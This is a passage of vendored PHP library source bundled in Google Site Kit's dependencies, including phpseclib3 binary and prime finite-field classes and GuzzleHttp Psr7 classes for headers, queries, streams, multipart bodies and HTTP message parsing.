$finalMask = \chr((1 << $m % 8) - 1); if ($finalMask == "\x00") { $finalMask = "\xff"; } $bitLen = $mStart + 1; $pad = \ceil($bitLen / 8); $h = $bitLen & 7; $h = $h ? 8 - $h : 0; $r = \rtrim(\substr($val, 0, -1), '0'); $u = [static::base2ToBase256(\strrev($r))]; for ($i = 1; $i < 8; $i++) { $u[] = static::base2ToBase256(\strrev(\str_repeat('0', $i) . $r)); } // implements algorithm 2.40 (in section 2.3.5) in "Guide to Elliptic Curve Cryptography" // with W = 8 $reduce = function ($c) use($u, $mStart, $m, $t, $finalMask, $pad, $h) { $c = \str_pad($c, $pad, "\x00", \STR_PAD_LEFT); for ($i = $mStart; $i >= $m;) { $g = $h >> 3; $mask = $h & 7; $mask = $mask ? 1 << 7 - $mask : 0x80; for (; $mask > 0; $mask >>= 1, $i--, $h++) { if (\ord($c[$g]) & $mask) { $temp = $i - $m; $j = $temp >> 3; $k = $temp & 7; $t1 = $j ? \substr($c, 0, -$j) : $c; $length = \strlen($t1); if ($length) { $t2 = \str_pad($u[$k], $length, "\x00", \STR_PAD_LEFT); $temp = $t1 ^ $t2; $c = $j ? \substr_replace($c, $temp, 0, $length) : $temp; } } } } $c = \substr($c, -$t); if (\strlen($c) == $t) { $c[0] = $c[0] & $finalMask; } return \ltrim($c, "\x00"); }; $this->instanceID = self::$instanceCounter++; \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer::setModulo($this->instanceID, $modulo); \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer::setRecurringModuloFunction($this->instanceID, $reduce); $this->randomMax = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($modulo, 2); } /** * Returns an instance of a dynamically generated PrimeFieldInteger class * * @param string $num * @return Integer */ public function newInteger($num) { return new \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer($this->instanceID, $num instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $num->toBytes() : $num); } /** * Returns an integer on the finite field between one and the prime modulo * * @return Integer */ public function randomInteger() { static $one; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } return new \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer($this->instanceID, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange($one, $this->randomMax)->toBytes()); } /** * Returns the length of the modulo in bytes * * @return int */ public function getLengthInBytes() { return \strlen(\Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer::getModulo($this->instanceID)); } /** * Returns the length of the modulo in bits * * @return int */ public function getLength() { return \strlen(\Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer::getModulo($this->instanceID)) << 3; } /** * Converts a base-2 string to a base-256 string * * @param string $x * @param int|null $size * @return string */ public static function base2ToBase256($x, $size = null) { $str = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bits2bin($x); $pad = \strlen($x) >> 3; if (\strlen($x) & 3) { $pad++; } $str = \str_pad($str, $pad, "\x00", \STR_PAD_LEFT); if (isset($size)) { $str = \str_pad($str, $size, "\x00", \STR_PAD_LEFT); } return $str; } /** * Converts a base-256 string to a base-2 string * * @param string $x * @return string */ public static function base256ToBase2($x) { if (\function_exists('gmp_import')) { return \gmp_strval(\gmp_import($x), 2); } return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2bits($x); } } <?php /** * Prime Finite Fields * * Utilizes the factory design pattern * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math; use Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer; /** * Prime Finite Fields * * @author Jim Wigginton <terrafrost@php.net> */ class PrimeField extends \Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField { /** * Instance Counter * * @var int */ private static $instanceCounter = 0; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Default constructor */ public function __construct(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $modulo) { if (!$modulo->isPrime()) { throw new \UnexpectedValueException('PrimeField requires a prime number be passed to the constructor'); } $this->instanceID = self::$instanceCounter++; \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::setModulo($this->instanceID, $modulo); \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::setRecurringModuloFunction($this->instanceID, $modulo->createRecurringModuloFunction()); } /** * Use a custom defined modular reduction function * * @return void */ public function setReduction(\Closure $func) { $this->reduce = $func->bindTo($this, $this); } /** * Returns an instance of a dynamically generated PrimeFieldInteger class * * @return Integer */ public function newInteger(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $num) { return new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer($this->instanceID, $num); } /** * Returns an integer on the finite field between one and the prime modulo * * @return Integer */ public function randomInteger() { static $one; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } return new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer($this->instanceID, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange($one, \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::getModulo($this->instanceID))); } /** * Returns the length of the modulo in bytes * * @return int */ public function getLengthInBytes() { return \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::getModulo($this->instanceID)->getLengthInBytes(); } /** * Returns the length of the modulo in bits * * @return int */ public function getLength() { return \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::getModulo($this->instanceID)->getLength(); } /** * Destructor */ public function __destruct() { \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer::cleanupCache($this->instanceID); } } phpseclib Lead Developer: TerraFrost (Jim Wigginton) phpseclib Developers: monnerat (Patrick Monnerat) bantu (Andreas Fischer) petrich (Hans-Jürgen Petrich) GrahamCampbell (Graham Campbell) hc-jworman<?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; final class Header { /** * Parse an array of header values containing ";" separated data into an * array of associative arrays representing the header key value pair data * of the header. When a parameter does not contain a value, but just * contains a key, this function will inject a key with a '' string value. * * @param string|array $header Header to parse into components. */ public static function parse($header) : array { static $trimmed = "\"' \n\t\r"; $params = $matches = []; foreach ((array) $header as $value) { foreach (self::splitList($value) as $val) { $part = []; foreach (\preg_split('/;(?=([^"]*"[^"]*")*[^"]*$)/', $val) ?: [] as $kvp) { if (\preg_match_all('/<[^>]+>|[^=]+/', $kvp, $matches)) { $m = $matches[0]; if (isset($m[1])) { $part[\trim($m[0], $trimmed)] = \trim($m[1], $trimmed); } else { $part[] = \trim($m[0], $trimmed); } } } if ($part) { $params[] = $part; } } } return $params; } /** * Converts an array of header values that may contain comma separated * headers into an array of headers with no comma separated values. * * @param string|array $header Header to normalize. * * @deprecated Use self::splitList() instead. */ public static function normalize($header) : array { $result = []; foreach ((array) $header as $value) { foreach (self::splitList($value) as $parsed) { $result[] = $parsed; } } return $result; } /** * Splits a HTTP header defined to contain a comma-separated list into * each individual value. Empty values will be removed. * * Example headers include 'accept', 'cache-control' and 'if-none-match'. * * This method must not be used to parse headers that are not defined as * a list, such as 'user-agent' or 'set-cookie'. * * @param string|string[] $values Header value as returned by MessageInterface::getHeader() * * @return string[] */ public static function splitList($values) : array { if (!\is_array($values)) { $values = [$values]; } $result = []; foreach ($values as $value) { if (!\is_string($value)) { throw new \TypeError('$header must either be a string or an array containing strings.'); } $v = ''; $isQuoted = \false; $isEscaped = \false; for ($i = 0, $max = \strlen($value); $i < $max; ++$i) { if ($isEscaped) { $v .= $value[$i]; $isEscaped = \false; continue; } if (!$isQuoted && $value[$i] === ',') { $v = \trim($v); if ($v !== '') { $result[] = $v; } $v = ''; continue; } if ($isQuoted && $value[$i] === '\\') { $isEscaped = \true; $v .= $value[$i]; continue; } if ($value[$i] === '"') { $isQuoted = !$isQuoted; $v .= $value[$i]; continue; } $v .= $value[$i]; } $v = \trim($v); if ($v !== '') { $result[] = $v; } } return $result; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Provides methods to determine if a modified URL should be considered cross-origin. * * @author Graham Campbell */ final class UriComparator { /** * Determines if a modified URL should be considered cross-origin with * respect to an original URL. */ public static function isCrossOrigin(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $original, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $modified) : bool { if (\strcasecmp($original->getHost(), $modified->getHost()) !== 0) { return \true; } if ($original->getScheme() !== $modified->getScheme()) { return \true; } if (self::computePort($original) !== self::computePort($modified)) { return \true; } return \false; } private static function computePort(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : int { $port = $uri->getPort(); if (null !== $port) { return $port; } return 'https' === $uri->getScheme() ? 443 : 80; } private function __construct() { // cannot be instantiated } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; final class Query { /** * Parse a query string into an associative array. * * If multiple values are found for the same key, the value of that key * value pair will become an array. This function does not parse nested * PHP style arrays into an associative array (e.g., `foo[a]=1&foo[b]=2` * will be parsed into `['foo[a]' => '1', 'foo[b]' => '2'])`. * * @param string $str Query string to parse * @param int|bool $urlEncoding How the query string is encoded */ public static function parse(string $str, $urlEncoding = \true) : array { $result = []; if ($str === '') { return $result; } if ($urlEncoding === \true) { $decoder = function ($value) { return \rawurldecode(\str_replace('+', ' ', (string) $value)); }; } elseif ($urlEncoding === \PHP_QUERY_RFC3986) { $decoder = 'rawurldecode'; } elseif ($urlEncoding === \PHP_QUERY_RFC1738) { $decoder = 'urldecode'; } else { $decoder = function ($str) { return $str; }; } foreach (\explode('&', $str) as $kvp) { $parts = \explode('=', $kvp, 2); $key = $decoder($parts[0]); $value = isset($parts[1]) ? $decoder($parts[1]) : null; if (!\array_key_exists($key, $result)) { $result[$key] = $value; } else { if (!\is_array($result[$key])) { $result[$key] = [$result[$key]]; } $result[$key][] = $value; } } return $result; } /** * Build a query string from an array of key value pairs. * * This function can use the return value of `parse()` to build a query * string. This function does not modify the provided keys when an array is * encountered (like `http_build_query()` would). * * @param array $params Query string parameters. * @param int|false $encoding Set to false to not encode, * PHP_QUERY_RFC3986 to encode using * RFC3986, or PHP_QUERY_RFC1738 to * encode using RFC1738. * @param bool $treatBoolsAsInts Set to true to encode as 0/1, and * false as false/true. */ public static function build(array $params, $encoding = \PHP_QUERY_RFC3986, bool $treatBoolsAsInts = \true) : string { if (!$params) { return ''; } if ($encoding === \false) { $encoder = function (string $str) : string { return $str; }; } elseif ($encoding === \PHP_QUERY_RFC3986) { $encoder = 'rawurlencode'; } elseif ($encoding === \PHP_QUERY_RFC1738) { $encoder = 'urlencode'; } else { throw new \InvalidArgumentException('Invalid type'); } $castBool = $treatBoolsAsInts ? static function ($v) { return (int) $v; } : static function ($v) { return $v ? 'true' : 'false'; }; $qs = ''; foreach ($params as $k => $v) { $k = $encoder((string) $k); if (!\is_array($v)) { $qs .= $k; $v = \is_bool($v) ? $castBool($v) : $v; if ($v !== null) { $qs .= '=' . $encoder((string) $v); } $qs .= '&'; } else { foreach ($v as $vv) { $qs .= $k; $vv = \is_bool($vv) ? $castBool($vv) : $vv; if ($vv !== null) { $qs .= '=' . $encoder((string) $vv); } $qs .= '&'; } } } return $qs ? (string) \substr($qs, 0, -1) : ''; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * PHP stream implementation. */ class Stream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { /** * @see https://www.php.net/manual/en/function.fopen.php * @see https://www.php.net/manual/en/function.gzopen.php */ private const READABLE_MODES = '/r|a\\+|ab\\+|w\\+|wb\\+|x\\+|xb\\+|c\\+|cb\\+/'; private const WRITABLE_MODES = '/a|w|r\\+|rb\\+|rw|x|c/'; /** @var resource */ private $stream; /** @var int|null */ private $size; /** @var bool */ private $seekable; /** @var bool */ private $readable; /** @var bool */ private $writable; /** @var string|null */ private $uri; /** @var mixed[] */ private $customMetadata; /** * This constructor accepts an associative array of options. * * - size: (int) If a read stream would otherwise have an indeterminate * size, but the size is known due to foreknowledge, then you can * provide that size, in bytes. * - metadata: (array) Any additional metadata to return when the metadata * of the stream is accessed. * * @param resource $stream Stream resource to wrap. * @param array{size?: int, metadata?: array} $options Associative array of options. * * @throws \InvalidArgumentException if the stream is not a stream resource */ public function __construct($stream, array $options = []) { if (!\is_resource($stream)) { throw new \InvalidArgumentException('Stream must be a resource'); } if (isset($options['size'])) { $this->size = $options['size']; } $this->customMetadata = $options['metadata'] ?? []; $this->stream = $stream; $meta = \stream_get_meta_data($this->stream); $this->seekable = $meta['seekable']; $this->readable = (bool) \preg_match(self::READABLE_MODES, $meta['mode']); $this->writable = (bool) \preg_match(self::WRITABLE_MODES, $meta['mode']); $this->uri = $this->getMetadata('uri'); } /** * Closes the stream when the destructed */ public function __destruct() { $this->close(); } public function __toString() : string { try { if ($this->isSeekable()) { $this->seek(0); } return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } \trigger_error(\sprintf('%s::__toString exception: %s', self::class, (string) $e), \E_USER_ERROR); return ''; } } public function getContents() : string { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->readable) { throw new \RuntimeException('Cannot read from non-readable stream'); } return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryGetContents($this->stream); } public function close() : void { if (isset($this->stream)) { if (\is_resource($this->stream)) { \fclose($this->stream); } $this->detach(); } } public function detach() { if (!isset($this->stream)) { return null; } $result = $this->stream; unset($this->stream); $this->size = $this->uri = null; $this->readable = $this->writable = $this->seekable = \false; return $result; } public function getSize() : ?int { if ($this->size !== null) { return $this->size; } if (!isset($this->stream)) { return null; } // Clear the stat cache if the stream has a URI if ($this->uri) { \clearstatcache(\true, $this->uri); } $stats = \fstat($this->stream); if (\is_array($stats) && isset($stats['size'])) { $this->size = $stats['size']; return $this->size; } return null; } public function isReadable() : bool { return $this->readable; } public function isWritable() : bool { return $this->writable; } public function isSeekable() : bool { return $this->seekable; } public function eof() : bool { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } return \feof($this->stream); } public function tell() : int { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } $result = \ftell($this->stream); if ($result === \false) { throw new \RuntimeException('Unable to determine stream position'); } return $result; } public function rewind() : void { $this->seek(0); } public function seek($offset, $whence = \SEEK_SET) : void { $whence = (int) $whence; if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->seekable) { throw new \RuntimeException('Stream is not seekable'); } if (\fseek($this->stream, $offset, $whence) === -1) { throw new \RuntimeException('Unable to seek to stream position ' . $offset . ' with whence ' . \var_export($whence, \true)); } } public function read($length) : string { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->readable) { throw new \RuntimeException('Cannot read from non-readable stream'); } if ($length < 0) { throw new \RuntimeException('Length parameter cannot be negative'); } if (0 === $length) { return ''; } try { $string = \fread($this->stream, $length); } catch (\Exception $e) { throw new \RuntimeException('Unable to read from stream', 0, $e); } if (\false === $string) { throw new \RuntimeException('Unable to read from stream'); } return $string; } public function write($string) : int { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->writable) { throw new \RuntimeException('Cannot write to a non-writable stream'); } // We can't know the size after writing anything $this->size = null; $result = \fwrite($this->stream, $string); if ($result === \false) { throw new \RuntimeException('Unable to write to stream'); } return $result; } /** * @return mixed */ public function getMetadata($key = null) { if (!isset($this->stream)) { return $key ? null : []; } elseif (!$key) { return $this->customMetadata + \stream_get_meta_data($this->stream); } elseif (isset($this->customMetadata[$key])) { return $this->customMetadata[$key]; } $meta = \stream_get_meta_data($this->stream); return $meta[$key] ?? null; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Reads from multiple streams, one after the other. * * This is a read-only stream decorator. */ final class AppendStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { /** @var StreamInterface[] Streams being decorated */ private $streams = []; /** @var bool */ private $seekable = \true; /** @var int */ private $current = 0; /** @var int */ private $pos = 0; /** * @param StreamInterface[] $streams Streams to decorate. Each stream must * be readable. */ public function __construct(array $streams = []) { foreach ($streams as $stream) { $this->addStream($stream); } } public function __toString() : string { try { $this->rewind(); return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } \trigger_error(\sprintf('%s::__toString exception: %s', self::class, (string) $e), \E_USER_ERROR); return ''; } } /** * Add a stream to the AppendStream * * @param StreamInterface $stream Stream to append. Must be readable. * * @throws \InvalidArgumentException if the stream is not readable */ public function addStream(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream) : void { if (!$stream->isReadable()) { throw new \InvalidArgumentException('Each stream must be readable'); } // The stream is only seekable if all streams are seekable if (!$stream->isSeekable()) { $this->seekable = \false; } $this->streams[] = $stream; } public function getContents() : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToString($this); } /** * Closes each attached stream. */ public function close() : void { $this->pos = $this->current = 0; $this->seekable = \true; foreach ($this->streams as $stream) { $stream->close(); } $this->streams = []; } /** * Detaches each attached stream. * * Returns null as it's not clear which underlying stream resource to return. */ public function detach() { $this->pos = $this->current = 0; $this->seekable = \true; foreach ($this->streams as $stream) { $stream->detach(); } $this->streams = []; return null; } public function tell() : int { return $this->pos; } /** * Tries to calculate the size by adding the size of each stream. * * If any of the streams do not return a valid number, then the size of the * append stream cannot be determined and null is returned. */ public function getSize() : ?int { $size = 0; foreach ($this->streams as $stream) { $s = $stream->getSize(); if ($s === null) { return null; } $size += $s; } return $size; } public function eof() : bool { return !$this->streams || $this->current >= \count($this->streams) - 1 && $this->streams[$this->current]->eof(); } public function rewind() : void { $this->seek(0); } /** * Attempts to seek to the given position. Only supports SEEK_SET. */ public function seek($offset, $whence = \SEEK_SET) : void { if (!$this->seekable) { throw new \RuntimeException('This AppendStream is not seekable'); } elseif ($whence !== \SEEK_SET) { throw new \RuntimeException('The AppendStream can only seek with SEEK_SET'); } $this->pos = $this->current = 0; // Rewind each stream foreach ($this->streams as $i => $stream) { try { $stream->rewind(); } catch (\Exception $e) { throw new \RuntimeException('Unable to seek stream ' . $i . ' of the AppendStream', 0, $e); } } // Seek to the actual position by reading from each stream while ($this->pos < $offset && !$this->eof()) { $result = $this->read(\min(8096, $offset - $this->pos)); if ($result === '') { break; } } } /** * Reads from all of the appended streams until the length is met or EOF. */ public function read($length) : string { $buffer = ''; $total = \count($this->streams) - 1; $remaining = $length; $progressToNext = \false; while ($remaining > 0) { // Progress to the next stream if needed. if ($progressToNext || $this->streams[$this->current]->eof()) { $progressToNext = \false; if ($this->current === $total) { break; } ++$this->current; } $result = $this->streams[$this->current]->read($remaining); if ($result === '') { $progressToNext = \true; continue; } $buffer .= $result; $remaining = $length - \strlen($buffer); } $this->pos += \strlen($buffer); return $buffer; } public function isReadable() : bool { return \true; } public function isWritable() : bool { return \false; } public function isSeekable() : bool { return $this->seekable; } public function write($string) : int { throw new \RuntimeException('Cannot write to an AppendStream'); } /** * @return mixed */ public function getMetadata($key = null) { return $key ? null : []; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Stream that when read returns bytes for a streaming multipart or * multipart/form-data stream. */ final class MultipartStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var string */ private $boundary; /** @var StreamInterface */ private $stream; /** * @param array $elements Array of associative arrays, each containing a * required "name" key mapping to the form field, * name, a required "contents" key mapping to a * StreamInterface/resource/string, an optional * "headers" associative array of custom headers, * and an optional "filename" key mapping to a * string to send as the filename in the part. * @param string $boundary You can optionally provide a specific boundary * * @throws \InvalidArgumentException */ public function __construct(array $elements = [], ?string $boundary = null) { $this->boundary = $boundary ?: \bin2hex(\random_bytes(20)); $this->stream = $this->createStream($elements); } public function getBoundary() : string { return $this->boundary; } public function isWritable() : bool { return \false; } /** * Get the headers needed before transferring the content of a POST file * * @param string[] $headers */ private function getHeaders(array $headers) : string { $str = ''; foreach ($headers as $key => $value) { $str .= "{$key}: {$value}\r\n"; } return "--{$this->boundary}\r\n" . \trim($str) . "\r\n\r\n"; } /** * Create the aggregate stream that will be used to upload the POST data */ protected function createStream(array $elements = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { $stream = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\AppendStream(); foreach ($elements as $element) { if (!\is_array($element)) { throw new \UnexpectedValueException('An array is expected'); } $this->addElement($stream, $element); } // Add the trailing boundary with CRLF $stream->addStream(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor("--{$this->boundary}--\r\n")); return $stream; } private function addElement(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\AppendStream $stream, array $element) : void { foreach (['contents', 'name'] as $key) { if (!\array_key_exists($key, $element)) { throw new \InvalidArgumentException("A '{$key}' key is required"); } } $element['contents'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($element['contents']); if (empty($element['filename'])) { $uri = $element['contents']->getMetadata('uri'); if ($uri && \is_string($uri) && \substr($uri, 0, 6) !== 'php://' && \substr($uri, 0, 7) !== 'data://') { $element['filename'] = $uri; } } [$body, $headers] = $this->createElement($element['name'], $element['contents'], $element['filename'] ?? null, $element['headers'] ?? []); $stream->addStream(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($this->getHeaders($headers))); $stream->addStream($body); $stream->addStream(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor("\r\n")); } /** * @param string[] $headers * * @return array{0: StreamInterface, 1: string[]} */ private function createElement(string $name, \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, ?string $filename, array $headers) : array { // Set a default content-disposition header if one was no provided $disposition = self::getHeader($headers, 'content-disposition'); if (!$disposition) { $headers['Content-Disposition'] = $filename === '0' || $filename ? \sprintf('form-data; name="%s"; filename="%s"', $name, \basename($filename)) : "form-data; name=\"{$name}\""; } // Set a default content-length header if one was no provided $length = self::getHeader($headers, 'content-length'); if (!$length) { if ($length = $stream->getSize()) { $headers['Content-Length'] = (string) $length; } } // Set a default Content-Type if one was not supplied $type = self::getHeader($headers, 'content-type'); if (!$type && ($filename === '0' || $filename)) { $headers['Content-Type'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\MimeType::fromFilename($filename) ?? 'application/octet-stream'; } return [$stream, $headers]; } /** * @param string[] $headers */ private static function getHeader(array $headers, string $key) : ?string { $lowercaseHeader = \strtolower($key); foreach ($headers as $k => $v) { if (\strtolower((string) $k) === $lowercaseHeader) { return $v; } } return null; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Lazily reads or writes to a file that is opened only after an IO operation * take place on the stream. */ final class LazyOpenStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var string */ private $filename; /** @var string */ private $mode; /** * @var StreamInterface */ private $stream; /** * @param string $filename File to lazily open * @param string $mode fopen mode to use when opening the stream */ public function __construct(string $filename, string $mode) { $this->filename = $filename; $this->mode = $mode; // unsetting the property forces the first access to go through // __get(). unset($this->stream); } /** * Creates the underlying stream lazily when required. */ protected function createStream() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen($this->filename, $this->mode)); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; final class Message { /** * Returns the string representation of an HTTP message. * * @param MessageInterface $message Message to convert to a string. */ public static function toString(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message) : string { if ($message instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface) { $msg = \trim($message->getMethod() . ' ' . $message->getRequestTarget()) . ' HTTP/' . $message->getProtocolVersion(); if (!$message->hasHeader('host')) { $msg .= "\r\nHost: " . $message->getUri()->getHost(); } } elseif ($message instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface) { $msg = 'HTTP/' . $message->getProtocolVersion() . ' ' . $message->getStatusCode() . ' ' . $message->getReasonPhrase(); } else { throw new \InvalidArgumentException('Unknown message type'); } foreach ($message->getHeaders() as $name => $values) { if (\is_string($name) && \strtolower($name) === 'set-cookie') { foreach ($values as $value) { $msg .= "\r\n{$name}: " . $value; } } else { $msg .= "\r\n{$name}: " . \implode(', ', $values); } } return "{$msg}\r\n\r\n" . $message->getBody(); } /** * Get a short summary of the message body. * * Will return `null` if the response is not printable. * * @param MessageInterface $message The message to get the body summary * @param int $truncateAt The maximum allowed size of the summary */ public static function bodySummary(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message, int $truncateAt = 120) : ?string { $body = $message->getBody(); if (!$body->isSeekable() || !$body->isReadable()) { return null; } $size = $body->getSize(); if ($size === 0) { return null; } $body->rewind(); $summary = $body->read($truncateAt); $body->rewind(); if ($size > $truncateAt) { $summary .= ' (truncated...)'; } // Matches any printable character, including unicode characters: // letters, marks, numbers, punctuation, spacing, and separators. if (\preg_match('/[^\\pL\\pM\\pN\\pP\\pS\\pZ\\n\\r\\t]/u', $summary) !== 0) { return null; } return $summary; } /** * Attempts to rewind a message body and throws an exception on failure. * * The body of the message will only be rewound if a call to `tell()` * returns a value other than `0`. * * @param MessageInterface $message Message to rewind * * @throws \RuntimeException */ public static function rewindBody(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message) : void { $body = $message->getBody(); if ($body->tell()) { $body->rewind(); } } /** * Parses an HTTP message into an associative array. * * The array contains the "start-line" key containing the start line of * the message, "headers" key containing an associative array of header * array values, and a "body" key containing the body of the message. * * @param string $message HTTP request or response to parse. */ public static function parseMessage(string $message) : array { if (!$message) { throw new \InvalidArgumentException('Invalid message'); } $message = \ltrim($message, "\r\n"); $messageParts = \preg_split("/\r?\n\r?\n/", $message, 2); if ($messageParts === \false || \count($messageParts) !== 2) { throw new \InvalidArgumentException('Invalid message: Missing header delimiter'); } [$rawHeaders, $body] = $messageParts; $rawHeaders .= "\r\n"; // Put back the delimiter we split previously $headerParts = \preg_split("/\r?\n/", $rawHeaders, 2); if ($headerParts === \false || \count($headerParts) !== 2) { throw new \InvalidArgumentException('Invalid message: Missing status line'); } [$startLine, $rawHeaders] = $headerParts; if (\preg_match("/(?:^HTTP\\/|^[A-Z]+ \\S+ HTTP\\/)(\\d+(?:\\.\\d+)?)/i", $startLine, $matches) && $matches[1] === '1.0') { // Header folding is deprecated for HTTP/1.1, but allowed in HTTP/1.0 $rawHeaders = \preg_replace(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Rfc7230::HEADER_FOLD_REGEX, ' ', $rawHeaders); } /** @var array[] $headerLines */ $count = \preg_match_all(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Rfc7230::HEADER_REGEX, $rawHeaders, $headerLines, \PREG_SET_ORDER); // If these aren't the same, then one line didn't match and there's an invalid header. if ($count !== \substr_count($rawHeaders, "\n")) { // Folding is deprecated, see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4 if (\preg_match(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Rfc7230::HEADER_FOLD_REGEX, $rawHeaders)) { throw new \InvalidArgumentException('Invalid header syntax: Obsolete line folding'); } throw new \InvalidArgumentException('Invalid header syntax'); } $headers = []; foreach ($headerLines as $headerLine) { $headers[$headerLine[1]][] = $headerLine[2]; } return ['start-line' => $startLine, 'headers' => $headers, 'body' => $body]; } /** * Constructs a URI for an HTTP request message. * * @param string $path Path from the start-line * @param array $headers Array of headers (each value an array). */ public static function parseRequestUri(string $path, array $headers) : string { $hostKey = \array_filter(\array_keys($headers), function ($k) { // Numeric array keys are converted to int by PHP. $k = (string) $k; return \strtolower($k) === 'host'; }); // If no host is found, then a full URI cannot be constructed. if (!$hostKey) { return $path; } $host = $headers[\reset($hostKey)][0]; $scheme = \substr($host, -4) === ':443' ? 'https' : 'http'; return $scheme . '://' . $host . '/' . \ltrim($path, '/'); } /** * Parses a request message string into a request object. * * @param string $message Request message string. */ public static function parseRequest(string $message) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { $data = self::parseMessage($message); $matches = []; if (!\preg_match('/^[\\S]+\\s+([a-zA-Z]+:\\/\\/|\\/).*/', $data['start-line'], $matches)) { throw new \InvalidArgumentException('Invalid request string'); } $parts = \explode(' ', $data['start-line'], 3); 